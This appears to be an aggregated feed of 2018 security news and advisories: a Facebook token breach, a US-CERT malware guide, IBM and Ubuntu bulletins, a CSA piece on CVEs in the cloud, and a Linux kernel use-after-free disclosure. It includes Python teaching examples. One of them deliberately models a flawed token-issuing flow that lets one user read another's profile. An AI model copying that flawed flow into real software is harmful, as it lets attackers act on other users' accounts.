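The token mix-up described here and in the item-by-item article above (items 2 and 7: an access token minted for the looked-up user rather than the viewer, and the mass token reset), as an added model in Python. This is not Facebook's code: the account names, the token format, the `profile_preview` and `mobile_app` scopes and the per-account generation counter used for resets are all assumptions. The point is the defender's lesson the reporting implies: a token issued inside an impersonation-style preview must be bound to the authenticated viewer, every API call must check that binding, and a reset must invalidate tokens already in circulation.

```python
import hashlib
import hmac
import json

# Constructed demo key; a real service keeps this in a secrets manager.
SERVER_KEY = b"constructed-demo-key-not-for-real-use"

# account_id -> current token generation. Bumping it invalidates every token
# issued before the bump, which is the effect of forcing a fresh login.
TOKEN_GENERATION = {}


def mint_token(subject_id, scope):
    """Issue a signed token. 'sub' names the account the token acts on behalf of."""
    claims = {"sub": subject_id, "scope": scope,
              "gen": TOKEN_GENERATION.get(subject_id, 0)}
    payload = json.dumps(claims, sort_keys=True)
    sig = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{sig}"


def verify_token(token):
    """Return the claims if the signature is valid, otherwise None."""
    payload, _, sig = token.rpartition("|")
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return json.loads(payload) if hmac.compare_digest(sig, expected) else None


def view_as_flawed(viewer_id, target_id):
    """Model of the bug chain the articles describe: the preview flow hands the
    viewer a full-privilege token minted for the *target* account."""
    return mint_token(target_id, "mobile_app")


def view_as_hardened(viewer_id, target_id):
    """Preview rendering stays server-side; the only token the flow ever mints
    is bound to the authenticated viewer and limited to a read-only preview scope."""
    return mint_token(viewer_id, "profile_preview")


def reset_tokens(account_id):
    """Invalidate all outstanding tokens for an account (forced log-out)."""
    TOKEN_GENERATION[account_id] = TOKEN_GENERATION.get(account_id, 0) + 1


def api_read_profile(token, account_id):
    """Gate every API call passes: signature, subject binding, freshness, scope."""
    claims = verify_token(token)
    if claims is None:
        return "denied: bad signature"
    if claims["sub"] != account_id:
        return "denied: token not bound to this account"
    if claims["gen"] != TOKEN_GENERATION.get(account_id, 0):
        return "denied: token was reset"
    if claims["scope"] != "mobile_app":
        return "denied: insufficient scope"
    return f"profile data for {account_id}"


if __name__ == "__main__":
    stolen = view_as_flawed("alice", "bob")        # alice previews as bob, gets bob's token
    print(api_read_profile(stolen, "bob"))          # the flaw: reads bob's data without bob's password
    reset_tokens("bob")                             # the remediation: bob's old tokens stop working
    print(api_read_profile(stolen, "bob"))
```

Note what the API gate cannot do on its own: the flawed token is genuinely signed and genuinely for the target account, so signature and subject checks pass it. That is why the fix has to be on the issuing side (a preview never mints a token for anyone but the viewer) and why, once such tokens are already out, the only remedy is the generation bump that logs everyone out.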

To protect its users' accounts, the company has already reset access tokens for nearly 50 million affected Facebook accounts and an additional 40 million accounts, as a precaution.

"As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened," the company said.

Facebook has also notified law enforcement officials of the security breach.

The story is developing...


from The Hacker News https://ift.tt/2OhcN2q

Python is a hit with hackers, report finds

ST18-248: Protecting Against Malicious Code

Original release date: September 28, 2018

What is malicious code?

Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on a computer. Various classifications of malicious code include viruses, worms, and Trojan horses.

  • Viruses have the ability to damage or destroy files on a computer system and are spread by sharing an already infected removable media, opening malicious email attachments, and visiting malicious web pages.
  • Worms are a type of virus that self-propagates from computer to computer. Their functionality is to consume all of your computer’s resources, which can cause your computer to stop responding.
  • Trojan horses are computer programs that hide a virus or a potentially damaging program. It is not uncommon for free software to contain a Trojan horse, making a user think they are using legitimate software while the program is performing malicious actions on the computer.

How can you protect yourself against malicious code?

Following these security practices can help you reduce the risks associated with malicious code:

  • Install and maintain antivirus software. Antivirus software recognizes malware and protects your computer against it. Installing antivirus software from a reputable vendor is an important step in preventing and detecting infections. Always visit vendor sites directly rather than clicking on advertisements or email links. Because attackers are continually creating new viruses and other forms of malicious code, it is important to keep your antivirus software up-to-date.
  • Use caution with links and attachments. Take appropriate precautions when using email and web browsers to reduce the risk of an infection. Be wary of unsolicited email attachments and use caution when clicking on email links, even if they seem to come from people you know. (See Using Caution with Email Attachments for more information.)
  • Block pop-up advertisements. Pop-up blockers disable windows that could potentially contain malicious code. Most browsers have a free feature that can be enabled to block pop-up advertisements.
  • Use an account with limited permissions. When navigating the web, it is a good security practice to use an account with limited permissions. If you do become infected, restricted permissions keep the malicious code from spreading and escalating to an administrative account.
  • Disable external media AutoRun and AutoPlay features. Disabling AutoRun and AutoPlay features prevents external media infected with malicious code from automatically running on your computer.
  • Change your passwords. If you believe your computer is infected, change your passwords. This includes any passwords for websites that may have been cached in your web browser. Create and use strong passwords, making them difficult for attackers to guess. (See Choosing and Protecting Passwords and Supplementing Passwords for more information.)
  • Keep software updated. Install software patches on your computer so attackers do not take advantage of known vulnerabilities. Consider enabling automatic updates, when available. (See Understanding Patches and Software Updates for more information.)
  • Back up data. Regularly back up your documents, photos, and important email messages to the cloud or to an external hard drive. In the event of an infection, your information will not be lost.
  • Install or enable a firewall. Firewalls can prevent some types of infection by blocking malicious traffic before it enters your computer. Some operating systems include a firewall; if the operating system you are using includes one, enable it. (See Understanding Firewalls for Home and Small Office Use for more information.)
  • Use anti-spyware tools. Spyware is a common virus source, but you can minimize infections by using a program that identifies and removes spyware. Most antivirus software includes an anti-spyware option; ensure you enable it.
  • Monitor accounts. Look for any unauthorized use of, or unusual activity on, your accounts—especially banking accounts. If you identify unauthorized or unusual activity, contact your account provider immediately.
  • Avoid using public Wi-Fi. Unsecured public Wi-Fi may allow an attacker to intercept your device’s network traffic and gain access to your personal information.

What do you need to know about antivirus software?

Antivirus software scans computer files and memory for patterns that indicate the possible presence of malicious code. You can perform antivirus scans automatically or manually.

  • Automatic scans – Most antivirus software can scan specific files or directories automatically. New virus information is added frequently, so it is a good idea to take advantage of this option.
  • Manual scans – If your antivirus software does not automatically scan new files, you should manually scan files and media you receive from an outside source before opening them, including email attachments, web downloads, CDs, DVDs, and USBs.

Although antivirus software can be a powerful tool in helping protect your computer, it can sometimes cause problems by interfering with the performance of your computer. Too much antivirus software can affect both your computer’s performance and the software’s effectiveness.

  • Investigate your options in advance. Research available antivirus and anti-spyware software to determine the best choice for you. Consider the amount of malicious code the software recognizes and how frequently the virus definitions are updated. Also, check for known compatibility issues with other software you may be running on your computer.
  • Limit the number of programs you install. Packages that incorporate both antivirus and anti-spyware capabilities together are now available. If you decide to choose separate programs, you only need one antivirus program and one anti-spyware program. Installing more programs increases your risk for problems.

There are many antivirus software program vendors, and deciding which one to choose can be confusing. Antivirus software programs all typically perform the same type of functions, so your decision may be based on recommendations, features, availability, or price. Regardless of which package you choose, installing any antivirus software will increase your level of protection.

How do you recover if you become a victim of malicious code?

Using antivirus software is the best way to defend your computer against malicious code. If you think your computer is infected, run your antivirus software program. Ideally, your antivirus program will identify any malicious code on your computer and quarantine them so they no longer affect your system. You should also consider these additional steps:

  • Minimize the damage. If you are at work and have access to an information technology (IT) department, contact them immediately. The sooner they can investigate and “clean” your computer, the less likely it is to cause additional damage to your computer—and other computers on the network. If you are on a home computer or laptop, disconnect your computer from the internet; this will prevent the attacker from accessing your system.
  • Remove the malicious code. If you have antivirus software installed on your computer, update the software and perform a manual scan of your entire system. If you do not have antivirus software, you can purchase it online or in a computer store. If the software cannot locate and remove the infection, you may need to reinstall your operating system, usually with a system restore disk. Note that reinstalling or restoring the operating system typically erases all of your files and any additional software that you have installed on your computer. After reinstalling the operating system and any other software, install all of the appropriate patches to fix known vulnerabilities.

Threats to your computer will continue to evolve. Although you cannot eliminate every hazard, by using caution, installing and using antivirus software, and following other simple security practices, you can significantly reduce your risk and strengthen your protection against malicious code.


Author: NCCIC

This product is provided subject to this Notification and this Privacy & Use policy.



from US-CERT National Cyber Alert System https://ift.tt/2xVT91K

BlackBerry beats Q2 targets, cites growth in automotive vertical

FBI solves mystery surrounding 15-year-old Fruitfly Mac malware

IC3 Issues Alert on RDP Exploitation

Original release date: September 28, 2018

The Internet Crime Complaint Center (IC3), in collaboration with DHS and the Federal Bureau of Investigation, has released an alert on cyber threat actors maliciously using legitimate remote administration tools, such as Remote Desktop Protocol (RDP). Threat actors identify and exploit vulnerable RDP sessions to facilitate credential theft and ransomware infection.

NCCIC encourages users and administrators to review the IC3 Alert and the NCCIC Tips on Securing Network Infrastructure Devices and Choosing and Protecting Passwords. If you believe you are a victim of cybercrime, file a complaint with IC3 at www.ic3.gov.






from US-CERT National Cyber Alert System https://ift.tt/2Qg31ee

Threat Roundup Sept 21 – 28


Threat Research

Threat Roundup Sept 21 – 28

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 21 and 28. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.




from Cisco Blog » Security https://ift.tt/2xW4VsK

IBM Security Bulletin: PowerKVM has released fixes in response to the vulnerabilities known as Foreshadow

Sep 28, 2018 9:01 am EDT

Categorized: High Severity


PowerKVM is affected by vulnerabilities in the Linux kernel. IBM has now addressed these vulnerabilities. Note that, although the CVE descriptions do not reference POWER, POWER CPUs are affected.

CVE(s): CVE-2018-3620

Affected product(s) and affected version(s):

PowerKVM 3.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=ibm10733108
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148318



from IBM Product Security Incident Response Team https://ift.tt/2zCfpQ9

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM SPSS Statistics

Sep 28, 2018 9:00 am EDT

Categorized: High Severity


There are multiple vulnerabilities in IBM® Runtime Environment Java™ Versions 6.0, 7.0, 7.1, and 8.0 used by IBM SPSS Statistics. IBM SPSS Statistics has addressed the applicable CVEs.

CVE(s): CVE-2018-1656, CVE-2018-12539

Affected product(s) and affected version(s):

IBM SPSS Statistics 21.0.0.2
IBM SPSS Statistics 22.0.0.2
IBM SPSS Statistics 23.0.0.3
IBM SPSS Statistics 24.0.0.2
IBM SPSS Statistics 25.0.0.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10732932
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/144882
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148389



from IBM Product Security Incident Response Team https://ift.tt/2zCfnI1

IBM Security Bulletin: Impersonation Issue Affects IBM WebSphere Portal (CVE-2018-1672)

Sep 28, 2018 9:00 am EDT

Categorized: Medium Severity


Impersonation may lead to incorrect user context in IBM WebSphere Portal (CVE-2018-1672)

CVE(s): CVE-2018-1672

Affected product(s) and affected version(s):

Affected Product        Affected Versions
IBM WebSphere Portal    9.0.0.0 – 9.0.0.0 CF15
IBM WebSphere Portal    8.5.0.0 – 8.5.0.0 CF15
IBM WebSphere Portal    8.0.0.0 – 8.0.0.1 CF23
IBM WebSphere Portal    7.0.0.0 – 7.0.0.2 CF30

For unsupported versions IBM recommends upgrading to a fixed, supported version of the product.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10716981
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/144958



from IBM Product Security Incident Response Team https://ift.tt/2zCeTBH

IBM Security Bulletin: Security Misconfiguration during Combined Cumulative Fix Installation Affects IBM WebSphere Portal (CVE-2018-1420)

Sep 28, 2018 9:00 am EDT

Categorized: Medium Severity


IBM WebSphere Portal resets access control settings to the out-of-the-box configuration during Combined Cumulative Fix (CF) installation. This can lead to a security misconfiguration of the installation (CVE-2018-1420).

CVE(s): CVE-2018-1420

Affected product(s) and affected version(s):

Affected Product        Affected Versions
IBM WebSphere Portal    9.0.0.0 – 9.0.0.0 CF15
IBM WebSphere Portal    8.5.0.0 – 8.5.0.0 CF15
IBM WebSphere Portal    8.0.0.0 – 8.0.0.1 CF22
IBM WebSphere Portal    7.0.0.0 – 7.0.0.2 CF30

For unsupported versions IBM recommends upgrading to a fixed, supported version of the product.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=swg22014276
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/138950



from IBM Product Security Incident Response Team https://ift.tt/2zCeQWx

CVE and Cloud Services, Part 2: Impacts on Cloud Vulnerability and Risk Management

By Victor Chin, Research Analyst, Cloud Security Alliance, and Kurt Seifried, Director of IT, Cloud Security Alliance


This is the second post in a series, where we’ll discuss cloud service vulnerability and risk management trends in relation to the Common Vulnerability and Exposures (CVE) system. In the first blog post, we wrote about the Inclusion Rule 3 (INC3) and how it affects the counting of cloud service vulnerabilities. Here, we will delve deeper into how the exclusion of cloud service vulnerabilities impacts enterprise vulnerability and risk management.


Traditional vulnerability and risk management

CVE identifiers are the linchpin of traditional vulnerability management processes. Besides being an identifier for vulnerabilities, the CVE system allows different services and business processes to interoperate, making enterprise IT environments more secure. For example, a network vulnerability scanner can identify whether a vulnerability (e.g. CVE-2018-1234) is present in a deployed system by querying said system.

The queries can be conducted in many ways, such as via a banner grab, querying the system for what software is installed, or even via proof of concept exploits that have been de-weaponized. Such queries confirm the existence of the vulnerability, after which risk management and vulnerability remediation can take place.

Once the existence of the vulnerability is confirmed, enterprises must conduct risk management activities. Enterprises might first prioritize vulnerability remediation according to the criticality of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is one basis on which vulnerabilities are triaged. The system gives each vulnerability a score according to how critical it is, and from there enterprises can prioritize and remediate the more critical ones. Like other vulnerability information, CVSS scores are normally associated with CVE IDs.

Next, mitigating actions can be taken to remediate the vulnerabilities. This could refer to implementing patches, workarounds, or applying security controls. How the organization chooses to address the vulnerability is an exercise of risk management. They have to carefully balance their resources in relation to their risk appetite. But generally, organizations choose risk avoidance/rejection, risk acceptance, or risk mitigation.

Risk avoidance and rejection is fairly straightforward. Here, the organization doesn’t want to mitigate the vulnerability; at the same time, based on the information available, it determines that the risk the vulnerability poses is above its risk threshold, so it stops using the vulnerable software.

Risk acceptance refers to when the organization, based on information available, determines that the risk posed is below their risk threshold and decides to accept the risk.

Lastly, in risk mitigation, the organization chooses to take mitigating actions and implement security controls that will reduce the risk. In traditional environments, such mitigating actions are possible because the organization generally owns and controls the infrastructure that provisions the IT service. For example, to mitigate a vulnerability, organizations are able to implement firewalls, intrusion detection systems, conduct system hardening activities, deactivate a service, change the configuration of a service, and many other options.

Thus, in traditional IT environments, organizations are able to take many mitigating actions because they own and control the stack. Furthermore, organizations have access to vulnerability information with which to make informed risk management decisions.

Cloud service customer challenges

Compared to traditional IT environments, the situation is markedly different for external cloud environments. The differences all stem from organizations not owning and controlling the infrastructure that provisions the cloud service, as well as not having access to vulnerability data of cloud native services.

Enterprise users don’t have ready access to cloud native vulnerability data because there is no official way to associate the data with cloud native vulnerabilities, as CVE IDs are not generally assigned to them. Consequently, it’s difficult for enterprises to make an informed, risk-based decision regarding a vulnerable cloud service: for example, when should an enterprise customer reject the risk and stop using the service, and when should it accept the risk and continue using the service?

Furthermore, even if CVE IDs are assigned to cloud native vulnerabilities, the differences between traditional and cloud environments are so vast that the vulnerability data normally associated with a CVE in a traditional environment is inadequate when dealing with cloud service vulnerabilities. For example, in a traditional IT environment, CVEs are linked to a software version. An enterprise customer can verify that a vulnerable version of the software is running by checking the software version. In cloud services, the versioning of the software (if there is one!) is usually only known to the cloud service provider and is not made public. Additionally, the enterprise user is unable to apply security controls or other mitigations to address the risk of a vulnerability.

This is not saying that CVEs and the associated vulnerability data are useless for cloud services. Instead, we should consider including vulnerability data that is useful in the context of a cloud service. In particular, cloud service vulnerability data should help enterprise cloud customers make the important risk-based decision of when to continue or stop using the service.

Thus, just as enterprise customers must trust cloud service providers with their sensitive data, they must also trust, blindly, that the cloud service providers are properly remediating the vulnerabilities in their environment in a timely manner.
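To make the scanner-plus-triage flow described above concrete, here is an added example in Python that is not part of the CSA post: a version-keyed CVE matcher feeding the post's mitigate/accept/avoid decision, which can only return "undetermined" for a cloud service whose software version is never published. The products, versions, scores and assets are constructed, and apart from the post's own CVE-2018-1234 placeholder the CVE IDs are placeholders too.

```python
"""Added example, not from the CSA post: a minimal scanner-style CVE-to-asset
matcher followed by the risk decision the post describes (mitigate, accept,
or avoid/reject). It shows why version-keyed CVE data cannot be applied to a
cloud service whose software version is never exposed to the customer.
Every product, version, score and asset below is a constructed sample value;
the CVE IDs are placeholders."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'2.4.29' -> (2, 4, 29), so affected ranges can be compared as tuples."""
    return tuple(int(part) for part in text.split("."))


@dataclass(frozen=True)
class CveRecord:
    cve_id: str
    product: str
    first_affected: str  # inclusive lower bound of the affected range
    fixed_in: str        # first fixed version (exclusive upper bound)
    cvss: float          # base score used for triage


@dataclass(frozen=True)
class Asset:
    name: str
    product: str
    version: Optional[str]         # None: provider does not publish a version
    customer_controls_stack: bool  # True for on-premises, False for SaaS


VULNERABLE, NOT_AFFECTED, UNDETERMINED = "VULNERABLE", "NOT_AFFECTED", "UNDETERMINED"


def match(asset: Asset, cve: CveRecord) -> str:
    """The version check a network vulnerability scanner performs."""
    if asset.product != cve.product:
        return NOT_AFFECTED
    if asset.version is None:
        # Cloud-native service: there is nothing to associate the CVE data with.
        return UNDETERMINED
    v = parse_version(asset.version)
    if parse_version(cve.first_affected) <= v < parse_version(cve.fixed_in):
        return VULNERABLE
    return NOT_AFFECTED


def decide(asset: Asset, cve: CveRecord, risk_threshold: float) -> str:
    """Map a finding to one of the post's three risk responses.
    A customer who does not own the stack cannot apply controls, so
    'mitigate' is unavailable; without version data the choice is blind."""
    status = match(asset, cve)
    if status == NOT_AFFECTED:
        return "no action"
    if status == UNDETERMINED:
        return "undetermined: no version data, decision rests on trust in provider"
    if cve.cvss < risk_threshold:
        return "accept"
    if asset.customer_controls_stack:
        return "mitigate"
    return "avoid/reject"


# Constructed sample data (placeholder CVE IDs, fictional products).
CVES = [
    CveRecord("CVE-2018-1234", "webserver", "2.4.0", "2.4.30", cvss=7.5),
    CveRecord("CVE-YYYY-NNNN", "dbms", "11.0", "11.3", cvss=4.3),
]
ASSETS = [
    Asset("web-01", "webserver", "2.4.29", customer_controls_stack=True),
    Asset("web-02", "webserver", "2.4.30", customer_controls_stack=True),
    Asset("saas-crm", "webserver", None, customer_controls_stack=False),
    Asset("managed-db", "dbms", "11.1", customer_controls_stack=False),
]


def triage(assets=ASSETS, cves=CVES, risk_threshold: float = 7.0) -> Dict[str, Dict[str, str]]:
    """Return {asset name: {cve_id: decision}} for each asset/CVE pair of the same product."""
    result: Dict[str, Dict[str, str]] = {}
    for asset in assets:
        for cve in cves:
            if cve.product == asset.product:
                result.setdefault(asset.name, {})[cve.cve_id] = decide(asset, cve, risk_threshold)
    return result


if __name__ == "__main__":
    for name, findings in triage().items():
        for cve_id, decision in findings.items():
            print(f"{name:12} {cve_id:15} {decision}")
```

Lowering the threshold below the managed database's score turns "accept" into "avoid/reject", because the SaaS customer has no "mitigate" option to fall back on.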

The CVE gap

With the increasing global adoption and proliferation of cloud services, the exclusion of service vulnerabilities from the CVE system and the impacts of said exclusion have left a growing gap that the cloud services industry should address. This gap not only impacts enterprise vulnerability and risk management but also other key stakeholders in the cloud services industry.

In the next post, we’ll explore how other key stakeholders are affected by the shortcomings of cloud service vulnerability management.

Please let us know what you think about the INC3’s impacts on cloud service vulnerability and risk management in the comment section below, or you can also email us.



from Cloud Security Alliance Blog https://ift.tt/2R4xxJ3

Julian Assange will no longer be editor-in-chief of WikiLeaks


Julian Assange, the founder of popular whistleblower website WikiLeaks, is stepping down from the position of editor-in-chief of the organisation under "extraordinary circumstances."

Assange, the 47-year-old Australian hacker, founded WikiLeaks in 2006 and has since made many high-profile leaks, exposing 'dirty' secrets of several individuals, political parties as well as government organisations across the world.

Assange has been forced to live in the Ecuadorian Embassy in London since June 2012, after he was granted asylum by the Ecuadorian government when a British court ordered his extradition to Sweden to face questioning over allegations of sexual assault and rape.

Ecuador has cut Assange off the Internet and any communication with the outside world except for his lawyers since late March this year, making it difficult for him to do his job of editor-in-chief to run WikiLeaks.

Wikileaks Appoints Its New Editor-in-Chief

According to a recent tweet from Wikileaks, those circumstances have forced the organisation to appoint its new editor-in-chief, though it says Assange will continue to be the publisher of WikiLeaks.

Assange will be replaced by former WikiLeaks spokesperson Kristinn Hrafnsson, an Icelandic investigative journalist who was selected for the 'Icelandic journalist of the year 2010' award for his work at WikiLeaks between 2009 and 2016.

"Due to extraordinary circumstances where Julian Assange, the founder of WikiLeaks has been held incommunicado (except visits by his lawyers) for six months while arbitrarily detained in the Ecuadorian embassy, Mr. Assange has appointed Kristinn Hrafnsson Editor in Chief of WikiLeaks. Mr. Assange will continue to be the publisher of WikiLeaks," the organisation said.

Hrafnsson, 56, condemned the treatment of Assange in the Embassy, but he welcomed his new responsibility to "secure the continuation of the important work based on WikiLeaks ideals," WikiLeaks quoted Hrafnsson as saying.

This year has not been great for the WikiLeaks founder. Late in March, Internet access for Assange was removed after he breached an agreement set by the Ecuador government to refrain from interfering in other states' affairs that could affect their relationship with other countries.

In July, it was also reported that the newly-elected President of Ecuador visited London to finalize a deal with the UK government to withdraw the country's asylum protection of Assange—eventually turning him over to the UK, where he is facing an arrest warrant after skipping a bail payment.



from The Hacker News https://ift.tt/2R53bGt

Cisco Security prominent at NIAS, NATO’s largest cyber security conference


NATO’s mission is to protect the freedom of its members. NATO has innovated and adapted itself to ensure its policies, capabilities and structures meet current and future threats, including the collective defence of its members.  In July 2016, Allies reaffirmed NATO’s defensive mandate and recognised cyberspace as a domain of operations in which NATO must defend itself as effectively as it does in the air, on land and at sea.  Cyber security is also a critical component of its operations, enabling intelligence to be safeguarded and operational communications to be secure and confidential.

The NIAS is NATO’s largest cyber security conference and provides an opportunity for Alliance and government leaders, defence and cyber security specialists to discuss needs and priorities and suitable and effective cyber security solutions.

Cisco Security will again have a prominent presence as Gold sponsor at NIAS, NATO’s largest cyber conference that takes place October 16-18 in Mons, Belgium, for three days of engaging discussions on the critical role cyber security plays in securing the NATO Alliance.

Every day Talos, Cisco’s security research team, analyses 1.5 million unique malware samples and blocks 20 billion threats using machine learning and cognitive analytics, backed by more than 250 threat intelligence researchers. By feeding intelligence on the latest threats into our security solutions in real time and using increased automation, we see a threat once and we stop it everywhere — enforcing intelligence across all of the network’s touch points and connections and reducing time to detection so that threats can be blocked before they cause damage.

Under the banner Security Above Everything, Cisco’s presence includes Anthony Grieco, Cisco’s Trust Strategy Officer, as the keynote speaker addressing how to manage cyber risk with a mobile workforce in a multi-cloud world and Martin Lee from Talos, Cisco Threat Intelligence as host of a technical workshop focused on securing the mobile workforce.

At the Cisco booth, delegates will be able to watch live demos and learn about our security products and solutions that enable private and public organisations to prevent, detect and respond to cyber attacks. Our customers and prospects are invited to book meetings with Cisco security experts through the event website.  If you are attending the conference, please stop by and see us at Stand G2.



from Cisco Blog » Security https://ift.tt/2zCmFvo

Windows 10 security: Here's how we're hitting back at fileless malware, says Microsoft

Meet Torii, a new IoT botnet far more sophisticated than Mirai variants

Google Hacker Discloses New Linux Kernel Vulnerability and PoC Exploit


A cybersecurity researcher with Google Project Zero has released the details of, and a proof-of-concept (PoC) exploit for, a high severity vulnerability that exists in the Linux kernel from version 3.16 through 4.18.8.

Discovered by white hat hacker Jann Horn, the kernel vulnerability (CVE-2018-17182) is a cache invalidation bug in the Linux memory management subsystem that leads to a use-after-free condition, which, if exploited, could allow an attacker to gain root privileges on the targeted system.

Use-after-free (UAF) vulnerabilities are a class of memory corruption bug that can be exploited by unprivileged users to corrupt or alter data in memory, enabling them to cause a denial of service (system crash) or escalate privileges to gain administrative access on a system.

Linux Kernel Exploit Takes an Hour to Gain Root Access

However, Horn says his PoC Linux kernel exploit made available to the public "takes about an hour to run before popping a root shell."

Horn responsibly reported the vulnerability to Linux kernel maintainers on September 12, and the Linux team fixed the issue in its upstream kernel tree within just two days, which Horn said was "exceptionally fast, compared to the fix times of other software vendors."

The Linux kernel vulnerability was disclosed on the oss-security mailing list on September 18 and was patched in the upstream-supported stable kernel versions 4.18.9, 4.14.71, 4.9.128, and 4.4.157 on the next day.

There's also a fix in release 3.16.58.

Debian and Ubuntu Linux Left Their Users Vulnerable for Over a Week

"However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched," Horn noted.

The researcher was disappointed knowing that some major Linux distributions, including Debian and Ubuntu, left their users exposed to potential attacks by not releasing kernel updates more than a week after the vulnerability was made public.

As of Wednesday, both Debian stable and Ubuntu releases 16.04 and 18.04 had not patched the vulnerability.

However, the Fedora project already rolled out a security patch to its users on 22 September.

"Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27," Horn noted.
"Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users—especially if the security impact is not announced publicly."

In response to Horn's blog post, the Ubuntu maintainers said they would possibly release the patches for the Linux kernel flaw around October 1, 2018.

Horn said that once the patch is deployed in the upstream kernel, the vulnerability and the patch become public, which, in this case, could allow malicious actors to develop a Linux kernel exploit to target users.
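As an added example that is not from the article or from Horn's write-up, the following Python check classifies a `uname -r` string against the fixed stable versions listed above. It compares within the kernel's own stable branch (4.9.127 is older than 4.9.128 even though it is numerically above 4.4.157) and, for the reason Horn gives, treats distribution-built kernels as inconclusive; the treatment of a "-" suffix as a vendor or local build is an assumption.

```python
"""Added example, not from the article or from Jann Horn's write-up: a
defender-side check that compares a `uname -r` string with the upstream
stable releases the article lists as carrying the CVE-2018-17182 fix.
The comparison is branch-aware and treats distribution-built kernels as
inconclusive, since, as the article notes, an upstream fix says nothing
about whether a distribution has actually shipped it."""
import re
from typing import Tuple

# Fixed upstream stable releases named in the article, keyed by branch.
FIXED_STABLE = {
    (4, 18): (4, 18, 9),
    (4, 14): (4, 14, 71),
    (4, 9): (4, 9, 128),
    (4, 4): (4, 4, 157),
    (3, 16): (3, 16, 58),
}
AFFECTED_FROM = (3, 16, 0)     # article: affected since 3.16
AFFECTED_THROUGH = (4, 18, 8)  # article: affected through 4.18.8

PATCHED = "patched"
VULNERABLE = "vulnerable"
NOT_AFFECTED = "not affected (older than 3.16)"
UNSUPPORTED = "vulnerable (branch has no listed fixed release)"
DISTRO = "distro/custom kernel: version is inconclusive, check the vendor advisory"


def parse_release(release: str) -> Tuple[Tuple[int, int, int], str]:
    """Split e.g. '4.15.0-34-generic' into ((4, 15, 0), '-34-generic')."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(.*)$", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0)), suffix


def assess(release: str) -> str:
    """Classify a kernel release string against the article's fixed versions."""
    version, suffix = parse_release(release)
    if suffix.startswith("-"):
        # Assumption: a '-' suffix marks a vendor or local build whose patch
        # level does not track upstream (Debian and Ubuntu backport fixes).
        return DISTRO
    if version < AFFECTED_FROM:
        return NOT_AFFECTED
    fixed = FIXED_STABLE.get(version[:2])
    if fixed is not None:
        # Same stable branch: only the patch level within that branch counts.
        return PATCHED if version >= fixed else VULNERABLE
    if version > AFFECTED_THROUGH:
        # Newer than the last affected release (4.19 and later).
        return PATCHED
    return UNSUPPORTED


if __name__ == "__main__":
    import platform
    running = platform.release()  # same string as `uname -r`
    print(f"{running}: {assess(running)}")
```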



from The Hacker News https://ift.tt/2R70X9C

Teenage Apple hacker avoids jail for 'hacky hack hack' attack

Thursday, September 27, 2018

USN-3719-3: Mutt vulnerabilities


A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 LTS

Summary

Several security issues were fixed in Mutt.

Software Description

  • mutt - text-based mailreader supporting MIME, GPG, PGP and threading

Details

USN-3719-1 fixed vulnerabilities in Mutt. Unfortunately, the fixes were not correctly applied to the packaging for Mutt in Ubuntu 16.04 LTS. This update corrects the oversight.

We apologize for the inconvenience.

Original advisory details:

It was discovered that Mutt incorrectly handled certain requests. An attacker could possibly use this to execute arbitrary code. (CVE-2018-14350, CVE-2018-14352, CVE-2018-14354, CVE-2018-14359, CVE-2018-14358, CVE-2018-14353, CVE-2018-14357)

It was discovered that Mutt incorrectly handled certain inputs. An attacker could possibly use this to access or expose sensitive information. (CVE-2018-14355, CVE-2018-14356, CVE-2018-14351, CVE-2018-14362, CVE-2018-14349)

Update instructions

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS
mutt - 1.5.24-1ubuntu0.2
mutt-patched - 1.5.24-1ubuntu0.2

To update your system, please follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.

After a standard system update you need to restart mutt to make all the necessary changes.




from Ubuntu Security Notices https://ift.tt/2DzyMNK

Researchers label Australian data-sharing legislation a 'significant misalignment'

NSW focuses on risk in AU$20m cybersecurity strategy

US sentences to prison its first ATM jackpotter

DNSSEC Key Signing Key Rollover

FBI warns companies about hackers increasingly abusing RDP connections

16-Year-Old Boy Who Hacked Apple's Private Systems Gets No Jail Time


